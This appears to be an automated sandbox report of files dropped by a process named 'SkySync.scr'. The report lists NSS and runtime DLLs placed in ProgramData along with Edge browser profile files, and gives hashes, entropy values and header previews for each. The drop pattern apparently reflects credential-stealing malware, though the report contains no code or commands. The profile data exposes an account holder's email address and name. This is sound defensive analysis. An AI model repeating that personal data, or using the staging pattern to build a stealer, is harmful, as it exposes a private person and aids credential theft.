Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3c610109-b925-4966-b2dd-6dfd272d6000.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14979
Entropy (8bit):	5.632945650099042
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeIjjJ8y9TIKf+qNrB:gIuERzA83h09RZxdJ8y9TIKfHNd
MD5:	D763E6AB6D806E02BC2801172EC8796C
SHA1:	6A4860CDC484524C1173FBC6F90867B77249144E
SHA-256:	348C283B981BAB353751CB2ECC5848A532265BB36145531521482F37BF8CF084
SHA-512:	757B1007C1D76F3E5A128F0DAA4ECAC815B8BF83736CF1DF6870D5E03A2D246DFFEB58CD40716B8ED682C5DDEAD1F18D7B339DD59417C5AAE6B279074C1D5E4B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6721b302-0146-4361-9416-ad343f4d0f80.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	14979
Entropy (8bit):	5.632869962755904
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeIjjt8y2bIKf+qNrB:gIuERzA83h09RZxdt8y2bIKfHNd
MD5:	F10567E0D0FF5FD4E3AFC917C8D5D197
SHA1:	37E7F13D94FC9B7F6BBBB22930CD41FF9DC0AC7A
SHA-256:	4ACACEF812F6E867A3557BA9AAA643AD258EBE36C031B31CCDF868296B6BA664
SHA-512:	C178B33C6A049CA9BCA7FC210A0FD179F34F31E7BA2932D1A3FE9E8235FC7D789BF785B5BD4FCF3CC681A5F24C266467FAB8563DBFD56DDB208082E10F6B06EA
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6abfe91a-04cd-41a8-92f1-89c504765177.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14979
Entropy (8bit):	5.632945650099042
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeIjjJ8y9TIKf+qNrB:gIuERzA83h09RZxdJ8y9TIKfHNd
MD5:	D763E6AB6D806E02BC2801172EC8796C
SHA1:	6A4860CDC484524C1173FBC6F90867B77249144E
SHA-256:	348C283B981BAB353751CB2ECC5848A532265BB36145531521482F37BF8CF084
SHA-512:	757B1007C1D76F3E5A128F0DAA4ECAC815B8BF83736CF1DF6870D5E03A2D246DFFEB58CD40716B8ED682C5DDEAD1F18D7B339DD59417C5AAE6B279074C1D5E4B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\a481d5a3-3e2d-4a70-a0aa-62521fe9d28c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640147994233411
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7P:fwUQC5VwBIiElEd2K57P7P
MD5:	9556F1C1EB928F151C39D722B01A3C1E
SHA1:	4BBA6DF13D15479171DEB6DD2D7799D75DBC620C
SHA-256:	603230F48A4E25E16C05C34F173516CC413CF5665DD5CDD4FE1658C67BAF3CEC
SHA-512:	072A3D2D56A8933D95817BCC04185D8EBCCA2BDAB436CFB5445E216FF0EE887DDCF6ED29D075BF3DC6507902E5A3A384AB6BCC89D8AE9672CE2A61B4C65247FD
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640147994233411
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7P:fwUQC5VwBIiElEd2K57P7P
MD5:	9556F1C1EB928F151C39D722B01A3C1E
SHA1:	4BBA6DF13D15479171DEB6DD2D7799D75DBC620C
SHA-256:	603230F48A4E25E16C05C34F173516CC413CF5665DD5CDD4FE1658C67BAF3CEC
SHA-512:	072A3D2D56A8933D95817BCC04185D8EBCCA2BDAB436CFB5445E216FF0EE887DDCF6ED29D075BF3DC6507902E5A3A384AB6BCC89D8AE9672CE2A61B4C65247FD
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-672531B8-15AC.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.03091676644195787
Encrypted:	false
SSDEEP:	192:/o9RmNDsqg2KxKhqmNEq+tDy7Ikl2oJ+0jsn8y08Tcm2RGOdBx:/rRhFWRyXl1s0408T2RGOD
MD5:	178234DB5F9F48B611EED2744B1CC159
SHA1:	8C1855A1A7A178F5CD5D1BB9B0A9841C3A8CFD60
SHA-256:	F6142E14F87A88123B6A68657467F48900379D7135AEC80E5598AEA41DC4760E
SHA-512:	CBD731D1A47A4425BB9C790F8187070D5419A1677B77A1ACF53013A2B4F35591C7DC9847E9C142D9706EFCAEFCC34E84DEBD3CEF9A6E2CF6DD60A2893BC4EC46
Malicious:	false
Preview:	...@..@...@.....C.].....@................K...K..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0......C<>.Z...................C<>.Z..................UMA.PersistentHistograms.DriveType......8...i.y.[".................................................i.y..Yd........A...........................7o.I'.Y.".4.............8o.I'.Y.................UMA.PersistentHistograms.HistogramsInStartupFile........ ...i.y.......7o.I'.Y..C<>.... ...i.y.......7o.I'.Y.7o.I........i.y..Yd........A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.........i.y.Pq.3................94.0.992.31-64".en-US*...Windows NT..10.0.1904224..x86_64..\|......".To Be Filled By O.E.M....x86_64:F..variations_seed_etag.."mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="P....5...............4.>.2...:..............0..,.......TelemetryPopSampleSampling......Default.................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-672531B9-524.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.028931535449167572
Encrypted:	false
SSDEEP:	192:/T6HgzrN4hW/NEhaIZ6WNJnp+dPn8y08Tcm2RGOdBx:/ew4h0q6QppIP08T2RGOD
MD5:	97B19052F4B7EE049D93F6652A71209A
SHA1:	CCDA28EA99C55E0BF66ABF56D7C33318F1C68500
SHA-256:	DC99B22DD03F03E69A7866B5E8A9537E7C102ACA20C08313012B5269854C71AB
SHA-512:	D055AFFCC509318E9CD2E5CAEFFDE8B3E9998A3113E3B8A8E33BF19E70DEEF330BD32E66139793CCECD3257DA2BF3A87F335AAE988A21CFDAA754FD309423125
Malicious:	false
Preview:	...@..@...@.....C.].....@................G..PG..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0......C<>.Z...................C<>.Z..................UMA.PersistentHistograms.DriveType......8...i.y.[".................................................i.y..Yd........A...........................7o.I'.Y.".4.............8o.I'.Y.................UMA.PersistentHistograms.HistogramsInStartupFile........ ...i.y.......7o.I'.Y..C<>.... ...i.y.......7o.I'.Y.7o.I........i.y..Yd........A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.........i.y.Pq.3................94.0.992.31-64".en-US*...Windows NT..10.0.1904224..x86_64..\|......".To Be Filled By O.E.M....x86_64:F..variations_seed_etag.."mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="P....5...............4.>.2...:..............0..,.......TelemetryPopSampleSampling......Default.................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-672532D3-1DC.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2048.000000, slope 17753217332035315519916605440.000000
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.22091950683400838
Encrypted:	false
SSDEEP:	1536:CHQRWv0MYFg03g3gnNr6x9VumfP0qfRGYSS1Uy:CHSWMtFg03mx9wmfP0qI2
MD5:	EDFC4B3782D4C387CCC0BB11E5D2B567
SHA1:	038FD7299F052102192E94B169E640A6AA14CC12
SHA-256:	2AD864C2D900E5483F8ADBA145CE18594C780F5F07A956969771D314A2FD9A79
SHA-512:	AEC04FD886D0F16318500CD64E20197136BC2E5141DCE54FDE0B2073D8E2A6D629FF192C20185C0660C4A961E5E7F5958DBAB3D6A988257FAF4AFBBB0A08729F
Malicious:	false
Preview:	...@..@...@.....C.].....@...............p:...4..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0......C<>.Z...................C<>.Z..................UMA.PersistentHistograms.DriveType......8...i.y.[".................................................i.y..Yd........A...........................7o.I'.Y.".4.............8o.I'.Y.................UMA.PersistentHistograms.HistogramsInStartupFile........ ...i.y.......7o.I'.Y..C<>.... ...i.y.......7o.I'.Y.7o.I........i.y..Yd........A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.........i.y.Pq.3................94.0.992.31-64".en-US*...Windows NT..10.0.1904224..x86_64..\|......".To Be Filled By O.E.M....x86_64:F..variations_seed_etag.."mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="P....5...............4.>.2...:..............0..,.......TelemetryPopSampleSampling......Default..@..<...%...msAutoToggleMSAPrtSSOForNonMSAProfile.......triggere

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	152
Entropy (8bit):	4.832943510559939
Encrypted:	false
SSDEEP:	3:Fg/fltlK7D2yQ9Bu2jVuDgmWUJ62+I3fdlYlWllt:qf1KryvpMgmTb3f0W/
MD5:	3237396355FF6E02C5BE06D3CA915188
SHA1:	44318D4E7D54B83835A97466146DAA476DD7E42C
SHA-256:	4CD7243C8924953366A32AC1ADCA0B423B1559FA5E71760A37699679D5C925CA
SHA-512:	AA9D450E060A38CC793404922A154AD058252670F26C314EF0D11D2FE45B51AA456563414A42C0AC38173C6C9A47032F040B8DEB23DE39BFDCD6E67595E9372F
Malicious:	false
Preview:	sdPC....................+.^..h#A...0.ER."mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="..................baf89b04-ec85-4201-8b33-0b186effe467............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\18fff6f6-ec9f-42d3-87c1-368098c155a4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	23881
Entropy (8bit):	5.594661841307792
Encrypted:	false
SSDEEP:	384:f/fCtIFJKhOObJ+UoAYDCx9TuqZz0VfUCh7xbog/OVILlC9RCRrUPVMXB6RBp8OL:f3WYJ8F1+UoAYDCx9Tuqh0VfUC9xbogq
MD5:	150E464C71632184593166BE5E78DF91
SHA1:	1C84FC52320C97F103329759ECCDB7E4A6ED81DA
SHA-256:	A599216B2D47510DBD9F923824BEC2E7994E0E7362AA6BDFEC76E109CB016391
SHA-512:	F3B8DAA441889422061BF288A61BD970C8FD14F214D91D6CB3430D101B13D6BF512CD451FE430AA871E22EE036DEDB7682573F9E04F08E74E0B0FB6D8F759F8D
Malicious:	false
Preview:	{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13374964693317964","location":5,"manifest":{"content_capabilities":{"include_globs":["https://excel.officeapps.live.com/","https://onenote.officeapps.live.com/","https://powerpoint.officeapps.live.com/","https://word-edit.officeapps.live.com/","https://excel.partner.officewebapps.cn/","https://onenote.partner.officewebapps.cn/","https://powerpoint.partner.officewebapps.cn/","https://word-edit.partner.officewebapps.cn/","https://excel.gov.online.office365.us/","https://onenote.gov.online.office365.us/","https://powerpoint.gov.online.office365.us/","https://word-edit.gov.online.office365.us/","https://

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\2a4de9d0-3452-4337-9121-d531de8846e0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9000
Entropy (8bit):	4.994257462742733
Encrypted:	false
SSDEEP:	192:18XcUTNk9jPcAWMdkxoouYI3+YJuRhFeB/NhK9:2cUTNk9jPcAWMdaooVIS/me9
MD5:	3CB1586353968B52F028A678ED76E36E
SHA1:	CA5D7CF1919B126888AE487BEF587ABA56CFC4C9
SHA-256:	14842C0CB079FF70AC52A3DDEB82275D34E792F24A8CF9E229C3755A7014B382
SHA-512:	DA5462C205157B953A8A2D87430C910B2B09ED2701D2110EA6A9AA0BC8CAC303479B2E09B87B069E1B30B29FFE70565BE544944D0CBF2E3255A80EEDFA30F54A
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_info":[{"account_id":"000340011677ED77","accountcapabilities":{"can_offer_extended_chrome_sync_promos":-1},"edge_account_age_group":3,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_is_test_on_premises_profile":false,"edge_account_last_name":"Shapira","edge_account_location":"CH","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_data_protection_type":0,"edge_is_data_protection_target":false,"edge_wam_aad_for_app_account_type":0,"email":"shahak.shapira@outlook.com","full_name":"","gaia":"000340011677ED77","given_name":"","hd":"","is_supervised_child":-1,"is_under_advanced_protection":false,"last_downloaded_image_url_with_size":"","locale":"","picture_url":""}],"account_tracker_service_last_update":"13335737597040910","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\529ba149-46bb-488c-a6e2-56efe193b330.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2491
Entropy (8bit):	5.025691982161567
Encrypted:	false
SSDEEP:	48:YPj114Vr8KVNkGkXX6VVks0LtpsA1Cx9crbJ/anUJaYPI7xaMGH1oB+CmCO:KDoGX6VVOZpsAAOrMn3YPo0MG6+Zh
MD5:	70FFCABAC8DE01F9F7C0BCCAF64C1619
SHA1:	D01EE1E0289EB0FBD2CF1EFF6703A86AABFD6438
SHA-256:	6FB61A4E8427C7FEF6986879C5A789CEBC9E57B2A7E20D62F5F3F2AB08C07F99
SHA-512:	EB6080E6F884507C15D3D1B109E33201838147282018C31FEFDD32133A4F13D3907EA9A9949C04ED0D1FBCBE1CBA002B9D1727F56BB51EBB0DFED54B11C88B98
Malicious:	false
Preview:	{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{}},"prefs":{"preference_reset_time":"13374964693055383"},"protection":{"macs":{"browser":{"show_home_button":"904452986128BBEE5A7B1FFB8F342100C3150E3D9FD76C4105DF33EB021E22FD"},"default_search_provider_data":{"template_url_data":"575D258E47F940C6887685ABA99A5839CBFE4BA30863349DFE0D0C375AAB8816"},"edge":{"services":{"account_id":"D456A886A0DBE318CF511789EB70CFBEB8B3E35DA05B44245AFA153CF2527082","identity":{"schema":"50E673A6E3700B5431DD5887049F3271B5C2BEA02D53D968CBD61D36F54D9292"},"last_account_id":"6A5B5A031791B5A5FA7238C8E3FDD8A324CC8F19F63EAD5B2E896B84A5786B51","last_username":"AEEC085E5852B256515B8A4CA04B9576AB6B11591758E5AF201224060FD694E8"}},"homepage":"B1E9FE8108A84F532486D13AAC43C0AFDA16D3DFC9EB2F743AEE11F89F2F163E","homepage_is_newtabpage":"3680F776D17E3C099431BAF5381FAB9BCC0C2C70FEA4C74D12324BC94A207119","media":{"cdm":{"origin_data":"CE16C9485175ED827C5B13C2EE9BFCEDDD3444AF290CF59B851C1B

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7ee53b32-5de7-4b1e-9ed8-53e80113885f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	MS Windows icon resource - 8 icons, 16x16, 32 bits/pixel, 20x20, 32 bits/pixel
Category:	dropped
Size (bytes):	71757
Entropy (8bit):	6.771708343960135
Encrypted:	false
SSDEEP:	1536:vAlMWz7vLDtDSVlXXwpFlorgLUxF+D4n6owPFCawP/:vvuWAUxFaoGw/
MD5:	E5E3377341056643B0494B6842C0B544
SHA1:	D53FD8E256EC9D5CEF8EF5387872E544A2DF9108
SHA-256:	E23040951E464B53B84B11C3466BBD4707A009018819F9AD2A79D1B0B309BC25
SHA-512:	83F09E48D009A5CF83FA9AA8F28187F7F4202C84E2D0D6E5806C468F4A24B2478B73077381D2A21C89AA64884DF3C56E8DC94EB4AD2D6A8085AC2FEB1E26C2EF
Malicious:	false
